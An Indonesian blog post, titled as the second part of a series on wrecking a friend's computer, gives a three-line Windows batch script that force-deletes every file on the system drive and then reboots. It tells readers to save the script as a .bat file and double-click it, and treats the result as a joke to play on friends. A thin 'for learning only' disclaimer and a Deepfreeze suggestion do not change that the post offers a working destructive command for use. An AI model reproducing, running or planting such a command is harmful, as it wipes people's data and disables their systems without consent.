Cara Mudah Merusak Komputer Teman Part II

Cara Mudah Merusak Komputer Teman Part II

Hallo Sahabat Setia TKJ Comunity !
Kali Ini saya Ingin Membahas Cara Merusak Komputer Orang Lain Ingat Ini hanya di lakukan Oleh orang profesional, jadi lakukan lah dengan Bijak ya.... Sebelum nya saya juga pernah membahas Bagaimana Cara merusak Windows PC atau Laptop Jika belum baca KLIK DISINI ,  sebenar nya di postingan ini, saya juga membahas cara merusak Windows Komputer atau laptop, namun dengan Cara yang berbeda, yaitu dengan Cara Menghapus system nya hehehehe


Sebelum kita masuk Ke Tutorial ini, ada baik nya kita membuat Kesepakatan, BAHWA SETIAP KERUSAKAN YANG DI AKIBATKAN OLEH ANDA DENGAN MENGIKUTI TUTORIAL INI, MAKA PIHAK ADMIN ATAU PENULIS DI BLOG INI TIDAK TAU MENAU, KARENA SAYA MEMBUAT TUTORIAL INI HANYA SEBAGAI BAHAN PEMBELAJARAN SAJA


Ok kalau Setuju baca langkah-langkah di bawah ini, dan jika tidak Setujuh maka kembali ke menu HOME dan cari Artikel Lain,

Saran : coba cara ini di komputer Atau laptop yang menggunakan Deepfreeze, agar tidak terjadi SESUATU (syahrini kali Sesuatu :D )

Ok deh langsung Kecara nya....

Pertama Buka Software Notpad Anda, not pad bawaan windows aja :)

Kedua ketikkan scrip di bawah ini ke notpad tersebut

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Ketiga Save, dan Simpan dengan Ekstensi .bat

lalu Coba klik 2x file .bat nya tadi, dan tunggu sejenak apa yang terjadi hehehehe
maaf jika tidak memberikan SS dari hasil nya, karena aQ gak Punya HP atau Kamera :P he he he
kalau mau SS nya kasi saya HP donk biar saya foto hasil kerusakan nya... :P #LOL
hahahaha

coba sendiri saja, soal nya Pengalaman yang akan menjawab nya :)

Ingat Lakukan di komputer yang ada Deepfreeze nya ya.....  dan LAKUKAN DENGAN BIJAK karena Ini bulan Puasa jadi jangan Jail2 sama teman ya :P

Jika ada pertanyaan komen aja di bawah Sob


share this article to: Facebook Twitter Google+ Linkedin Technorati Digg
Posted by Yudha Situmorang, Published at 23.22 and have 2 comments

2 comments:

  1. woy poso2 kok aneh2 seng di share...tobat2

    BalasHapus
  2. hehehehehe... gak papa tu...
    :P

    thank's ya buat waktu nya :)

    BalasHapus

Blog INI DOFOLLOW namun yang Boleh Komentar hanya yang Menggunakan Akun Google dan yang sudah Memfollow blog Ini, tolong di follow dulu sebelum mendapat backlink